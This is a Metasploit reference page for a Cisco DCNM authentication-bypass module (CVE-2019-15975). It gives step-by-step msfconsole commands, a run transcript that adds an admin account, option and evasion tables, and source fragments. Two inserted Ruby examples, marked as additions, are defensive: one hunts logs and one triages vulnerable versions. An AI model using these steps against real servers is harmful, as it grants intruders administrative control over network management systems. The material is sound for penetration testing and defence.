Cisco DCNM auth bypass - Metasploit
This page contains detailed information about how to use the auxiliary/admin/networking/cisco_dcnm_auth_bypass Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Cisco DCNM auth bypass
Module: auxiliary/admin/networking/cisco_dcnm_auth_bypass
Source code: modules/auxiliary/admin/networking/cisco_dcnm_auth_bypass.rb
Disclosure date: 2020-06-01
Last modification time: 2021-08-27 17:15:33 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2019-15975
This exploit adds an admin account, with credentials you choose, to a Cisco DCNM. After that, you can log in to the web interface with those credentials. The only necessary condition is that an admin has connected more or less recently, as this exploit uses a kind of session stealing.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Reliability:
- repeatable-session: The module is expected to get a shell every time it runs.
Stability:
- crash-safe: Module should not crash the service.
Side Effects:
- ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
- config-changes: Module modifies some configuration setting on the target machine.
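One way to hunt for the ioc-in-logs side effect, as an added example that is not part of the module or of the original page: it flags sources that send the module's default UserAgent (listed under Advanced Options) in a burst, as the RETRIES loop would. The combined access-log format, the 60-second window, the threshold of 5 and the sample lines are assumptions constructed for illustration.

```ruby
require 'time'

# Added example, not Metasploit code. Log format, window and threshold are assumptions.
DEFAULT_UA = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)' # module default UserAgent
LINE_RE = /\A(\S+) \S+ \S+ \[([^\]]+)\] "[^"]*" \d{3} \S+ "[^"]*" "([^"]*)"\z/

# Returns { source_ip => largest request count inside any window } for every
# source that sent the default User-Agent at least `threshold` times per window.
def suspicious_sources(lines, window_s: 60, threshold: 5)
  by_ip = Hash.new { |h, k| h[k] = [] }
  lines.each do |line|
    m = LINE_RE.match(line.strip)
    next unless m && m[3] == DEFAULT_UA
    by_ip[m[1]] << Time.strptime(m[2], '%d/%b/%Y:%H:%M:%S %z').to_i
  end
  by_ip.each_with_object({}) do |(ip, times), out|
    times.sort!
    best = 0
    left = 0
    times.each_with_index do |t, right|
      left += 1 while t - times[left] > window_s # slide the window start forward
      best = [best, right - left + 1].max
    end
    out[ip] = best if best >= threshold
  end
end

# Constructed sample: six rapid requests from one host, plus ordinary traffic.
SAMPLE_LOG = (0...6).map { |i|
  %(198.51.100.7 - - [01/Jun/2020:10:00:0#{i} +0000] "GET / HTTP/1.1" 200 512 "-" "#{DEFAULT_UA}")
} + [
  %(192.0.2.10 - - [01/Jun/2020:10:00:03 +0000] "GET / HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64)"),
  %(192.0.2.11 - - [01/Jun/2020:10:05:00 +0000] "GET / HTTP/1.1" 200 2048 "-" "#{DEFAULT_UA}")
]

if __FILE__ == $PROGRAM_NAME
  suspicious_sources(SAMPLE_LOG).each { |ip, n| puts "#{ip}: #{n} requests with the default UA in 60s" }
end
```

A hit is a lead for reviewing the DCNM admin account list rather than proof of compromise, and because UserAgent is a settable option, an empty result does not clear a host.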
Basic Usage
msf > use auxiliary/admin/networking/cisco_dcnm_auth_bypass
msf auxiliary(cisco_dcnm_auth_bypass) > show targets
... a list of targets ...
msf auxiliary(cisco_dcnm_auth_bypass) > set TARGET target-id
msf auxiliary(cisco_dcnm_auth_bypass) > show options
... show and set options ...
msf auxiliary(cisco_dcnm_auth_bypass) > exploit
Required Options
- RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Knowledge Base
Description
This module exploits CVE-2019-15975, which affects Cisco DCNM versions 11.2 up to but not including 11.3(1). The exploit adds an admin account with any credentials you want. You can then log in to the web interface of Cisco DCNM with those credentials. The only necessary condition is that an admin has connected more or less recently (probably something like within the last hours), as this exploit uses a kind of session stealing.
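To triage an inventory against the affected range stated above, the following added example (not code from the module or the original page) parses release strings of the form 11.2(1) and classifies each host. The hostnames and versions are constructed, and strings that do not parse are reported as unknown rather than as safe.

```ruby
# Added example, not Metasploit code. Range boundaries are the ones this page states:
# 11.2 up to, but not including, 11.3(1).
AFFECTED_FROM = [11, 2, 0].freeze
FIXED_IN      = [11, 3, 1].freeze

# Parse a release string such as "11.2(1)" into [major, minor, maintenance].
# Returns nil when the string does not match, so the caller can flag it for review.
def parse_dcnm_version(str)
  m = /\A\s*(\d+)\.(\d+)(?:\((\d+)\))?\s*\z/.match(str.to_s)
  return nil unless m

  [m[1].to_i, m[2].to_i, (m[3] || 0).to_i]
end

# Classify one version string as :affected, :not_affected or :unknown.
def dcnm_status(str)
  v = parse_dcnm_version(str)
  return :unknown if v.nil?

  in_range = (v <=> AFFECTED_FROM) >= 0 && (v <=> FIXED_IN).negative?
  in_range ? :affected : :not_affected
end

# Group an inventory of { host => version string } by status.
def triage(inventory)
  inventory.group_by { |_host, ver| dcnm_status(ver) }
           .transform_values { |pairs| pairs.map(&:first).sort }
end

# Constructed inventory for illustration.
INVENTORY = {
  'dcnm-lab-01' => '11.2(1)',
  'dcnm-prod-01' => '11.3(1)',
  'dcnm-prod-02' => '11.1(1)',
  'dcnm-dr-01' => 'unknown build'
}.freeze

if __FILE__ == $PROGRAM_NAME
  triage(INVENTORY).each { |status, hosts| puts "#{status}: #{hosts.join(', ')}" }
end
```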
Installation
A vulnerable version of Cisco DCNM can be downloaded from here. Then follow all the steps in the installation interface. You might have to set up a database if the auto installation of PostgreSQL fails for instance (that was my case and I finally had to manually install PostgreSQL).
Verification Steps
- Start msfconsole
- use auxiliary/admin/networking/cisco_dcnm_auth_bypass
- set RHOST <target_host>
- Run check to check if the targeted Cisco DCNM is vulnerable
- set USERNAME <username> and set PASSWORD <password> to specify the credentials you want to add
- run the module to exploit the CVE and add an admin account with those credentials
Options
RHOSTS
Set the target host.
USERNAME
Set the USERNAME of the admin account you want to add.
PASSWORD
Set the PASSWORD of the admin account you want to add.
RETRIES
You can change the maximum number of attempts to add an admin account by using set RETRIES <max_retries>.
Scenarios
DCNM 11.2(1) - Linux OVA Appliance
msf6 > use auxiliary/admin/networking/cisco_dcnm_auth_bypass
msf6 auxiliary(admin/networking/cisco_dcnm_auth_bypass) > set RHOST 192.168.159.33
RHOST => 192.168.159.33
msf6 auxiliary(admin/networking/cisco_dcnm_auth_bypass) > check
[+] 192.168.159.33:443 - The target is vulnerable.
msf6 auxiliary(admin/networking/cisco_dcnm_auth_bypass) > run
[*] Running module against 192.168.159.33
[+] Admin account with username: 'frederick' and password: '1OwNqJnO' added!
[*] Auxiliary module execution completed
msf6 auxiliary(admin/networking/cisco_dcnm_auth_bypass) >
Msfconsole Usage
Here is how the admin/networking/cisco_dcnm_auth_bypass auxiliary module looks in the msfconsole:
msf6 > use auxiliary/admin/networking/cisco_dcnm_auth_bypass
msf6 auxiliary(admin/networking/cisco_dcnm_auth_bypass) > show info
Name: Cisco DCNM auth bypass
Module: auxiliary/admin/networking/cisco_dcnm_auth_bypass
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2020-06-01
Provided by:
MR_ME
Yann Castel (yann.castel[at]orange.com)
Module side effects:
ioc-in-logs
config-changes
Module stability:
crash-safe
Module reliability:
repeatable-session
Check supported:
Yes
Basic options:
Name       Current Setting  Required  Description
----       ---------------  --------  -----------
PASSWORD   Su8DpCqE         yes       The password of the admin account you want to add
Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
RETRIES    50               yes       Retry count for the attack
RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT      443              yes       The target port (TCP)
SSL        true             no        Negotiate SSL/TLS for outgoing connections
TARGETURI  /                yes       The base path of the Cisco DCNM
USERNAME   sylvester        yes       The username of the admin account you want to add
VHOST                       no        HTTP server virtual host
Description:
This exploit is able to add an admin account to a Cisco DCNM with
credentials you can choose. After that, you can login to the web
interface with those credentials. The only necessary condition is
the more or less recent connection of an admin as this exploit uses
a kind of session stealing.
References:
https://nvd.nist.gov/vuln/detail/CVE-2019-15975
https://www.exploit-db.com/exploits/48018
Module Options
This is a complete list of options available in the admin/networking/cisco_dcnm_auth_bypass auxiliary module:
msf6 auxiliary(admin/networking/cisco_dcnm_auth_bypass) > show options
Module options (auxiliary/admin/networking/cisco_dcnm_auth_bypass):
Name       Current Setting  Required  Description
----       ---------------  --------  -----------
PASSWORD   Su8DpCqE         yes       The password of the admin account you want to add
Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
RETRIES    50               yes       Retry count for the attack
RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT      443              yes       The target port (TCP)
SSL        true             no        Negotiate SSL/TLS for outgoing connections
TARGETURI  /                yes       The base path of the Cisco DCNM
USERNAME   sylvester        yes       The username of the admin account you want to add
VHOST                       no        HTTP server virtual host
Advanced Options
Here is a complete list of advanced options supported by the admin/networking/cisco_dcnm_auth_bypass auxiliary module:
msf6 auxiliary(admin/networking/cisco_dcnm_auth_bypass) > show advanced
Module advanced options (auxiliary/admin/networking/cisco_dcnm_auth_bypass):
Name                  Current Setting                                     Required  Description
----                  ---------------                                     --------  -----------
DOMAIN                WORKSTATION                                         yes       The domain to use for Windows authentication
DigestAuthIIS         true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
FingerprintCheck      true                                                no        Conduct a pre-exploit fingerprint verification
HttpClientTimeout                                                         no        HTTP connection and receive timeout
HttpPassword                                                              no        The HTTP password to specify for authentication
HttpRawHeaders                                                            no        Path to ERB-templatized raw headers to append to existing headers
HttpTrace             false                                               no        Show the raw HTTP requests and responses
HttpTraceColors       red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
HttpTraceHeadersOnly  false                                               no        Show HTTP headers only in HttpTrace
HttpUsername                                                              no        The HTTP username to specify for authentication
SSLVersion            Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
UserAgent             Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
VERBOSE               false                                               no        Enable detailed status messages
WORKSPACE                                                                 no        Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the admin/networking/cisco_dcnm_auth_bypass module can do:
msf6 auxiliary(admin/networking/cisco_dcnm_auth_bypass) > show actions
Auxiliary actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the admin/networking/cisco_dcnm_auth_bypass auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(admin/networking/cisco_dcnm_auth_bypass) > show evasion
Module evasion options:
Name                          Current Setting  Required  Description
----                          ---------------  --------  -----------
HTTP::header_folding          false            no        Enable folding of HTTP headers
HTTP::method_random_case      false            no        Use random casing for the HTTP method
HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request
Error Messages
This module may fail with the following error messages:
Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.
Target <RHOST> could not be reached.
Here is a relevant code snippet related to the "Target <RHOST> could not be reached." error message:
  r = send_request_cgi({
    'method' => 'GET',
    'uri' => normalize_uri(target_uri.path)
  })

  fail_with(Failure::Unreachable, "Target #{rhost} could not be reached.") unless r

  r_time = DateTime.strptime(r.headers['Date'][0..-4], '%a, %d %b %Y %H:%M:%S').strftime('%s')
  r_time
end
Didn't succeed after <RETRIES> attempts
Here is a relevant code snippet related to the "Didn't succeed after <RETRIES> attempts" error message:
    if res != :fail && res != :failed_to_connect

      return res
    end
  end
  print_error("Didn't succeed after #{datastore['RETRIES']} attempts")
  res
end

def check
  res = add_admin_account('test', 'test')
Unable to add admin account due to bad password strength
Here is a relevant code snippet related to the "Unable to add admin account due to bad password strength" error message:
def run
  res = add_admin_account(datastore['USERNAME'], datastore['PASSWORD'])
  if res == :success
    print_good("Admin account with username: '#{datastore['USERNAME']}' and password: '#{datastore['PASSWORD']}' added!")
  elsif res == :weak_password
    print_error('Unable to add admin account due to bad password strength')
  elsif res == :user_already_exists
    print_error('Unable to add admin account because this username already exists')
  else
    print_error('Something went wrong')
  end
Unable to add admin account because this username already exists
Here is a relevant code snippet related to the "Unable to add admin account because this username already exists" error message:
    if res == :success
      print_good("Admin account with username: '#{datastore['USERNAME']}' and password: '#{datastore['PASSWORD']}' added!")
    elsif res == :weak_password
      print_error('Unable to add admin account due to bad password strength')
    elsif res == :user_already_exists
      print_error('Unable to add admin account because this username already exists')
    else
      print_error('Something went wrong')
    end
  end
end
Something went wrong
Here is a relevant code snippet related to the "Something went wrong" error message:
    if res == :success
      print_good("Admin account with username: '#{datastore['USERNAME']}' and password: '#{datastore['PASSWORD']}' added!")
    elsif res == :weak_password
      print_error('Unable to add admin account due to bad password strength')
    elsif res == :user_already_exists
      print_error('Unable to add admin account because this username already exists')
    else
      print_error('Something went wrong')
    end
  end
end
See Also
Check also the following modules related to this module:
- auxiliary/admin/networking/cisco_asa_extrabacon
- auxiliary/admin/networking/cisco_config
- auxiliary/admin/networking/cisco_dcnm_download
- auxiliary/admin/networking/cisco_secure_acs_bypass
- auxiliary/admin/networking/cisco_vpn_3000_ftp_bypass
- auxiliary/admin/http/cisco_7937g_ssh_privesc
- auxiliary/admin/networking/arista_config
- auxiliary/admin/networking/brocade_config
- auxiliary/admin/networking/f5_config
- auxiliary/admin/networking/juniper_config
- auxiliary/admin/networking/mikrotik_config
- auxiliary/admin/networking/ubiquiti_config
- auxiliary/admin/networking/vyos_config
- auxiliary/dos/cisco/cisco_7937g_dos
- auxiliary/dos/cisco/cisco_7937g_dos_reboot
- auxiliary/gather/cisco_pvc2300_download_config
- auxiliary/gather/cisco_rv320_config
- auxiliary/scanner/http/cisco_asa_asdm
- auxiliary/scanner/http/cisco_asa_asdm_bruteforce
- auxiliary/scanner/http/cisco_asa_clientless_vpn
- auxiliary/scanner/http/cisco_device_manager
- auxiliary/scanner/http/cisco_directory_traversal
- auxiliary/scanner/http/cisco_firepower_download
- auxiliary/scanner/http/cisco_firepower_login
- auxiliary/scanner/http/cisco_ios_auth_bypass
- auxiliary/scanner/http/cisco_ironport_enum
- auxiliary/scanner/http/cisco_nac_manager_traversal
- auxiliary/scanner/http/cisco_ssl_vpn
- auxiliary/scanner/http/cisco_ssl_vpn_priv_esc
- auxiliary/scanner/ike/cisco_ike_benigncertain
- auxiliary/scanner/misc/cisco_smart_install
- auxiliary/scanner/snmp/cisco_config_tftp
- auxiliary/scanner/snmp/cisco_upload_file
- auxiliary/voip/cisco_cucdm_call_forward
- auxiliary/voip/cisco_cucdm_speed_dials
Authors
- MR_ME
- Yann Castel (yann.castel[at]orange.com)
Version
This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.